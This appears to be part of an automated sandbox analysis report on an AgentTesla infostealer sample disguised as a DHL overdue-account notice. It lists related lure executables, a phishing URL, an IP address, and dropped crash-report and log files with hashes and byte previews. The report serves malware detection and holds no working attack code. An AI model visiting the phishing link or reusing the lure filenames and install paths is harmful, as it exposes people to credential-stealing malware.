                            https://pub-02d879d6055b4f31b3db7cbbb1499011.r2.dev/%60%60~~~%5D%5D%5D%5D%5D.html#theunis@khk.co.zaGet hashmaliciousHTMLPhisherBrowse
                            • 162.241.27.10
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Roaming\boqXv\boqXv.exeTYPE_C_31_M_12 TAMAR 25.4.2024.exeGet hashmaliciousAgentTeslaBrowse
                              Total Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                62402781, Fiyat Teklif Talebi.pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                  CREDIT NOTE.exeGet hashmaliciousAgentTeslaBrowse
                                    Total Invoices.exeGet hashmaliciousAgentTeslaBrowse
                                      BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                        BARSYL SHIPPING Co (VIETNAM).exeGet hashmaliciousAgentTeslaBrowse
                                          Urgent PO 18-3081 Confirmation.exeGet hashmaliciousAgentTeslaBrowse
                                            CAHKHCM2404009CFS.exeGet hashmaliciousAgentTeslaBrowse
                                              FAR.N_2430-240009934.exeGet hashmaliciousAgentTeslaBrowse
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.3192452659091853
                                                Encrypted:false
                                                SSDEEP:192:a+79VetkFaAv+0BU/6aOOJo1ZrFqq6zuiFPZ24IO8u:B9Fa6BU/6aJRZzuiFPY4IO8u
                                                MD5:18C8807BF363CDB82A790BB8B6FFEA58
                                                SHA1:01B6D616C0C29A1FC6B8E0446344EA3D9874AAFF
                                                SHA-256:2C76E89A3112A47B95A06FA53D4E1B8790D4315C8AE1130DB911814FD378E7B7
                                                SHA-512:058FB8AD4C8845EB479AF62968DB3415BB61BF22FCBC2FD75F182282AA88760DC59AFF50A7201BB49B7EF664A2731E0DF9DC7682AE59C8EFD4B83EE75D12845B
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.2.3.8.6.1.4.1.3.8.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.2.3.8.7.2.6.6.3.6.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.0.6.5.b.1.b.5.-.2.f.1.2.-.4.c.b.f.-.a.f.c.1.-.3.7.e.3.1.7.9.d.3.0.9.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.c.6.9.6.1.c.-.1.4.9.e.-.4.0.7.7.-.a.a.1.b.-.9.1.3.8.c.b.e.e.d.0.4.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.H.L. .-. .O.V.E.R.D.U.E. .A.C.C.O.U.N.T. .N.O.T.I.C.E. .-. .1.3.0.1.6.6.9.3.5.0...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.o.Z.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.8.4.-.0.0.0.1.-.0.0.1.5.-.0.c.e.7.-.b.5.9.d.b.0.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.d.0.9.f.a.7.0.9.b.3.8.6.4.b.e.2.5.6.d.c.c.0.c.4.2.4.1.3.3.1.5.0.0.0.0.0.0.0.0.!.0.0.0.0.1.5.1.c.7.c.8.1.a.8.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.2843380745914814
                                                Encrypted:false
                                                SSDEEP:192:6h07HkneNRk8w1O7v+0BU/HlkauOJo1ZrFqyozuiFPZ24IO8fet:57E31IBU/aapRTzuiFPY4IO8W
                                                MD5:27176EAB4D4D1E8BCEC170509D989E81
                                                SHA1:CBC4F295575384FDA04D8776DA5C8E1750CFB713
                                                SHA-256:81A248483A85BFA8DF9168EA1332D891D3C3C17BC591500678D57C02DF9867D0
                                                SHA-512:D941CE183D72C2A930F2EC92F6CAED6F7EE6BBC769B63F56881BF41545BA126439554814905F4BBDCD369BE9ADA22FF422F695780F9779B3AE45C865F04BF8FF
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.2.3.9.5.4.7.8.1.6.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.2.3.9.7.2.2.8.1.5.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.f.9.6.0.9.d.-.8.e.2.b.-.4.b.9.e.-.a.3.c.0.-.f.5.2.8.e.e.b.6.c.4.8.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.8.8.a.6.0.9.-.b.b.d.f.-.4.8.c.f.-.a.9.f.c.-.a.2.2.8.0.0.5.d.a.0.d.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.J.A.G.v.e.c.D.W...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.o.Z.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.b.8.-.0.0.0.1.-.0.0.1.5.-.0.3.3.7.-.8.2.a.2.b.0.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.d.0.9.f.a.7.0.9.b.3.8.6.4.b.e.2.5.6.d.c.c.0.c.4.2.4.1.3.3.1.5.0.0.0.0.0.0.0.0.!.0.0.0.0.1.5.1.c.7.c.8.1.a.8.f.1.e.9.d.d.8.8.9.e.e.f.1.2.e.8.c.4.c.a.6.7.4.9.4.9.5.d.a.c.!.L.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 08:06:26 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):360546
                                                Entropy (8bit):4.081705367550406
                                                Encrypted:false
                                                SSDEEP:6144:jd/7vhv1VEiEEWVj4AT8peYTgbTheMPvy:j55v1kX1YTgeMH
                                                MD5:C5032B3ED081312EDFD1588703E7C097
                                                SHA1:CFEE6A4D2011A19755F7AC35F753F4477B49E738
                                                SHA-256:B7979DBC2B19861D009ED4DE9BEA7CA8D3A0B38CD4C9A497ABF6508E4F713AC9
                                                SHA-512:4FD013746265364198138E3A329AC3F319E8BA6C45D5E18770D2759B216C6CB3DF556B4FD0D0A749B1DE18C1E8E10C25E361EA5B8ED484115ECB9497A496254A
                                                Malicious:false
                                                Preview:MDMP..a..... ........`+f.........................#..........$....-......T0..Xh..........`.......8...........T...........(G..:9...........-.........../..............................................................................eJ......p0......GenuineIntel............T...........y`+f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8504
                                                Entropy (8bit):3.71396809981572
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJ+16zP6Y2D7SUAxOfgmfZ56prm89b8SsfXb0m:R6lXJM6b6Y2SUAx+gmfX48Rfd
                                                MD5:C5335539E642EB9C615937234808A939
                                                SHA1:39D3B5744BB7C2D75B2F6FB1D12A4A1F33F031ED
                                                SHA-256:4249D7E3B04C97146FEF8DB1C45A3187DC038A5E8441F7007C13E319834F2B53
                                                SHA-512:BE63EE582BA4280F130C847FBB85C91AEB30DCEE522EEED4716689EEA9DB3C749C6A24FA3B6F97E3C220E8CABD6F9323E4D7C30365D00E00148446585FB704B4
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.3.2.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4865
                                                Entropy (8bit):4.574317774614031
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zstJg77aI9zEVWpW8VYMLYm8M4JFe8FqkU+q8veem2D3iHd:uIjfHI7hEk7VtOJKkUK82D3Md
                                                MD5:B870A6F65449F919104FDC570F55C609
                                                SHA1:D4170B1FBD72FE15EA45A01DDA3F49A1EFFD2D54
                                                SHA-256:C88EDC2028D0D3D3DD6228B1ABD975D7523B99BC90DB653025AADC696A0552FD
                                                SHA-512:FAF53EF1E7AAC67F7CE214F14C3619E15C842737FE72109260CDE9AFD39FE57E8CAE70287C04E8E8C7457B31D9AF8737E7AF89F29C6BDD1FB4C1D7B7E55E5302
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 08:06:36 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):356074
                                                Entropy (8bit):4.076411196391038
                                                Encrypted:false
                                                SSDEEP:3072:DUmi1x96g4apxzdEUyIhSHe/d4SU4uEqYr7LfVnCWLTgfM+qIIyr1tsKiX:DJE9x5xzdrheQU4b7LfVHTg5FIyfsXX
                                                MD5:FC90271CECEE30ADF16D70C1761B93CA
                                                SHA1:3B156254A32F62E1EF399141CFF9512CC1D086BF
                                                SHA-256:A96C9A584FBE11EA173A389F000F28054196377A1CA17E8791C2F4C9927775FB
                                                SHA-512:955F768857789E310955A7F0EC73A328FF6698CEE89FF4A2FF9D7F7F5F0CA954FEDE179651710FC42EB23EBB335C10E36FDBCFC6936E62F8485C02E6CF56A224
                                                Malicious:false
                                                Preview:MDMP..a..... ........`+f........................t#..........<...\-......./...g..........`.......8...........T........... E...)...........-.........../..............................................................................eJ.......0......GenuineIntel............T............`+f............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6384
                                                Entropy (8bit):3.7222245590318335
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJF9O6gE9YZpF6prg89btcsfpxvm:R6lXJG6hY16tvfpE
                                                MD5:0967B89F2C1F5B328A3076BBAAF21190
                                                SHA1:061E788E525BCBB890013765A872E572D46A9F01
                                                SHA-256:69B48210817EC0D3169F1810F74D90721328BF5E3B974370B388B8634F19315F
                                                SHA-512:61784B4CEFA35011A4F946581AE0C7BCB1C4A6E83F64D5DE61147A770DB92CEB1739197C1CD827D6F2DEF55224F7E999504598A4F61CA622F01BDDF3B32BB954
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.4.4.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4731
                                                Entropy (8bit):4.4697981657723584
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zstJg77aI9zEVWpW8VYjYm8M4JUQRe8FI9C+q8viRe22htfHd:uIjfHI7hEk7VjJUQbKij2ht/d
                                                MD5:7FC62174713C29564DE18A32C429910A
                                                SHA1:2B6F74990B275B599E8E2453461CA899F5F88583
                                                SHA-256:863D7CA025652B7EF5C6984FD99C705483BDF3445C7257547A9A71893973EA7B
                                                SHA-512:5C3A387399C948ED1DC50B3107FF665CD4FA014327511549D439E5EE2AA90AD07A24D72CEB1E5AE531B1CB82777F3B787E277484B1F64B700CFDCE03FD9DCEE1
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="296589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:false
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                Process:C:\Users\user\AppData\Roaming\LJAGvecDW.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:false
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                Process:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):142
                                                Entropy (8bit):5.090621108356562
                                                Encrypted:false
                                                SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                MD5:8C0458BB9EA02D50565175E38D577E35
                                                SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                Malicious:false
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2232
                                                Entropy (8bit):5.380805901110357
                                                Encrypted:false
                                                SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                                MD5:16AD599332DD2FF94DA0787D71688B62
                                                SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
                                                SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
                                                SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
                                                Malicious:false
                                                Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
